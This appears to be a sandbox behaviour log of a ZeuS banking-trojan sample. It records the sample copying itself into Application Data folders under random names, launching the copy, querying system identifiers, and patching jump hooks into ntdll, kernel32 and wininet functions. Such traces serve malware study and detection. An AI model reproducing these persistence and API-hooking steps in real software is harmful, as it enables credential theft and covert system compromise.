Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 380000 Length: 12FF20 Allocation Type: null Protection: page read and write success or wait 1968439374
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 381000 Length: 12FBFC Allocation Type: null Protection: page read and write success or wait 1968439685
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 390000 Length: 12FEA4 Allocation Type: null Protection: page execute and read and write success or wait 1968441398
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 390000 Length: 12FEA8 Allocation Type: null Protection: page execute and read and write success or wait 1968441665
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3B0000 Length: 12FEA8 Allocation Type: null Protection: page execute and read and write success or wait 1968442642
File opened Path: C:\Documents and Settings\Administrator\Application Data\887021879.log Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 1970946032
File created Path: C:\Documents and Settings\Administrator\Application Data\887021879.log Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1970946770
File write Path: C:\Documents and Settings\Administrator\Application Data\887021879.log Offset: none Length: 5 Value: 31 36 37 39 30 success or wait 1970947809
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 400000 Length: 12FD60 Allocation Type: null Protection: page execute and read and write success or wait 1970966659
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 400000 Length: 27000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1970966784
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 1970976887
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 1970979224
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 930000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 1970983870
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 930000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 1971000767
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 1971001817
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 3E0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 1971005839
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 3E0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1971007030
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 3E0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1971008009
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 1971019705
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 930000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 1971025482
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 930000 Size: 618496 Protection: readonly Mapped to pid: own pid object name not found 1971030311
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 1971030941
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 1971033078
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 1971033704
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 1971035695
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 1971036313
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 1971038418
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 1971039051
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 1971046299
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 440000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 1971048722
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 1971051446
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 1971054940
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 1971099078
Section loaded Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 1971099683
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 400000 Length: 1000 New Protection: page readonly New Protection: page execute and read and write success or wait 1971102314
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 401000 Length: 21000 New Protection: page execute read New Protection: page execute and read and write success or wait 1971102445
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 422000 Length: 3000 New Protection: page read and write New Protection: page execute and read and write success or wait 1971102985
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 425000 Length: 2000 New Protection: page readonly New Protection: page execute and read and write success or wait 1971103114
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: B50000 Length: 12F910 Allocation Type: null Protection: page read and write success or wait 1971103389
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: B50000 Length: 12F914 Allocation Type: null Protection: page read and write success or wait 1971103489
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 181000 Length: 12F448 Allocation Type: null Protection: page read and write success or wait 1971107712
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 182000 Length: 12F448 Allocation Type: null Protection: page read and write success or wait 1971112706
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 183000 Length: 12F448 Allocation Type: null Protection: page read and write success or wait 1971116708
File opened Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1971141123
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: BD0000 Length: 12FAEC Allocation Type: null Protection: page read and write success or wait 1971141452
File read Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Offset: none Length: 171520 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1971141581
Mutant created Name: \BaseNamedObjects\Global\{CADEDF10-E78D-E5A8-185B-81F8EE8A3A3D} success or wait 1971281976
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C811195 Length: 1 Value: 8B success or wait 1971285221
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 410440 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 1971285496
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 410440 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 1971285745
File created Path: C:\Documents and Settings\Administrator\Application Data\Foluv Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident Attributes: normal Content Overwritten: false success or wait 1971286350
File created Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 1971288515
File created Path: C:\Documents and Settings\Administrator\Application Data\Qiokze Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident Attributes: normal Content Overwritten: false success or wait 1971290148
Privilege adjusted Privilege: Security On or off: on success or wait 1971293950
File created Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 1971297520
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: ComputerName success or wait 1971300684
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft Name: InstallDate success or wait 1971300865
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft Name: DigitalProductId buffer overflow 1971301103
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft Name: DigitalProductId buffer overflow 1971301308
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft Name: DigitalProductId success or wait 1971301478
Thread delayed Time: 0 TID: 10048 success or wait 1971306421
Thread delayed Time: 0 TID: 10048 success or wait 1971378790
Thread delayed Time: 0 TID: 10048 success or wait 1971490555
Thread delayed Time: 0 TID: 10048 success or wait 1971602452
Thread delayed Time: 0 TID: 10048 success or wait 1971714336
Thread delayed Time: 0 TID: 10048 success or wait 1971826395
Thread delayed Time: 0 TID: 10048 success or wait 1971938081
Thread delayed Time: 0 TID: 10048 success or wait 1972050586
Thread delayed Time: 0 TID: 10048 success or wait 1972167521
Thread delayed Time: 0 TID: 10048 success or wait 1972273628
Thread delayed Time: 0 TID: 10048 success or wait 1972385447
Thread delayed Time: 0 TID: 10048 success or wait 1972497402
Thread delayed Time: 0 TID: 10048 success or wait 1972609150
Thread delayed Time: 0 TID: 10048 success or wait 1972721331
Thread delayed Time: 0 TID: 10048 success or wait 1972833357
Thread delayed Time: 0 TID: 10048 success or wait 1972945268
Thread delayed Time: 0 TID: 10048 success or wait 1973057080
Thread delayed Time: 0 TID: 10048 success or wait 1973169044
Thread delayed Time: 0 TID: 10048 success or wait 1973280837
Thread delayed Time: 0 TID: 10048 success or wait 1973403985
Thread delayed Time: 0 TID: 10048 success or wait 1973504481
Thread delayed Time: 0 TID: 10048 success or wait 1973616411
Thread delayed Time: 0 TID: 10048 success or wait 1973728334
Thread delayed Time: 0 TID: 10048 success or wait 1973843275
Thread delayed Time: 0 TID: 10048 success or wait 1973951956
Thread delayed Time: 0 TID: 10048 success or wait 1974063919
Thread delayed Time: 0 TID: 10048 success or wait 1974176798
Thread delayed Time: 0 TID: 10048 success or wait 1974288316
Thread delayed Time: 0 TID: 10048 success or wait 1974399660
Thread delayed Time: 0 TID: 10048 success or wait 1974511336
Thread delayed Time: 0 TID: 10048 success or wait 1974626098
Thread delayed Time: 0 TID: 10048 success or wait 1974735304
Thread delayed Time: 0 TID: 10048 success or wait 1974847185
Thread delayed Time: 0 TID: 10048 success or wait 1974962191
Thread delayed Time: 0 TID: 10048 success or wait 1975070833
Thread delayed Time: 0 TID: 10048 success or wait 1975182722
Thread delayed Time: 0 TID: 10048 success or wait 1975294512
Thread delayed Time: 0 TID: 10048 success or wait 1975406470
Thread delayed Time: 0 TID: 10048 success or wait 1975518361
File opened Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1975632185
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: BD0000 Length: 12EF0C Allocation Type: null Protection: page read and write success or wait 1975633129
File read Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Offset: none Length: 171520 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1975633440
File opened Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1976052387
File other operation Disposition: BasicInformation Data : 0000000000000000000000000000000000000000000000000000000000000000A000000000000000 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe success or wait 1976054522
File created Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 1976056454
File write Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Offset: none Length: 171520 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1977260769
File opened Path: C:\Documents and Settings\Administrator\Application Data Access: read attributes and synchronize and generic read Options: synchronous io non alert and open for backup ident Attributes: none Content Overwritten: false success or wait 1977265262
File opened Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Access: read attributes and write attributes and synchronize Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1977269255
File other operation Disposition: BasicInformation Data : 0000000000000000000000000000000000000000000000000000000000000000A000000000000000 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe success or wait 1977270176
File opened Path: C:\Documents and Settings\Administrator\Application Data\Foluv Access: read attributes and write attributes and synchronize Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false file is a directory 1977271214
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei Access: read attributes and write attributes and synchronize Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1977276357
File other operation Disposition: BasicInformation Data : 00FF93D1CB24CC0100FF93D1CB24CC0100FF93D1CB24CC0100000000000000000000000000000000 Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei success or wait 1977277282
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze Access: read attributes and write attributes and synchronize Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false file is a directory 1977278422
File opened Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1977280351
Section loaded Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 1977281273
Section loaded Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: unknown Baseaddress: BD0000 Size: 57344 Protection: read write Mapped to pid: own pid success or wait 1977301366
Section loaded Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: BE0000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 1977304023
Section loaded Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid success or wait 1977306464
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: BE0000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 1977312679
Section loaded Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Access: query and read Type: commit Baseaddress: BE0000 Size: 172032 Protection: readonly Mapped to pid: own pid success or wait 1977350658
Process created PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Cmdline: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Createflags: 0 success or wait 1977355479
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: D20000 Length: D1F6A8 Allocation Type: null Protection: page read and write success or wait 2002713527
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: D20000 Length: D1F6AC Allocation Type: null Protection: page read and write success or wait 2002713796
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2002725049
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: Enabled object name not found 2002725876
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: EnabledV8 success or wait 2002726454
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: CleanCookies success or wait 2002727015
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: CleanCookies success or wait 2002727580
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1406 success or wait 2002728169
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1609 success or wait 2002728753
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1406 success or wait 2002729339
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1609 success or wait 2002729918
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1406 success or wait 2002730504
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1609 success or wait 2002731086
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1406 success or wait 2002731674
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1609 success or wait 2002732254
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1406 success or wait 2002732838
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1609 success or wait 2002733420
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: D1F47C Allocation Type: null Protection: page execute and read and write success or wait 2002734442
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2002735425
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 2002735722
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002736030
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002736312
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 B6 7B success or wait 2002736664
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2002737016
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C90D000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 2002737311
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C90D1AE Length: 5 Value: E9 33 B7 2E 84 success or wait 2002737661
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2002737976
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2002738934
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 2002739224
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA000A Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002739526
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002739819
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 B7 7B success or wait 2002740179
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2002740445
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C916000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 2002740737
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C91632D Length: 5 Value: E9 94 27 2E 84 success or wait 2002741087
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C91632D Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2002741397
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C811195 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2002742605
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C811195 Length: 30 Value: 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 2002742899
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0014 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002743191
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002743487
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0014 Length: 10 Value: 8B FF 55 8B EC E9 7C 11 A7 7B success or wait 2002743846
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C811195 Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2002744112
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C811000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 2002744405
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C811195 Length: 5 Value: E9 CE 79 3E 84 success or wait 2002744756
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C811195 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2002745068
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94FABE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2002746699
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94FABE Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03 success or wait 2002746991
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA001E Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002747766
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002748065
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA001E Length: 10 Value: 8B FF 55 8B EC E9 9B FA BA 3C success or wait 2002748427
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94FABE Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2002748696
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94F000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 2002748992
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94FABE Length: 5 Value: E9 97 45 2B C3 success or wait 2002749345
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94FABE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2002749660
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D95EE89 Length: 30 Value: 8B FF 55 8B EC 6A 10 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 19 FD FE FF 5D success or wait 2002751420
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002752074
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0028 Length: 10 Value: 8B FF 55 8B EC E9 5C EE BB 3C success or wait 2002752432
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D95EE89 Length: 5 Value: E9 20 52 2A C3 success or wait 2002753347
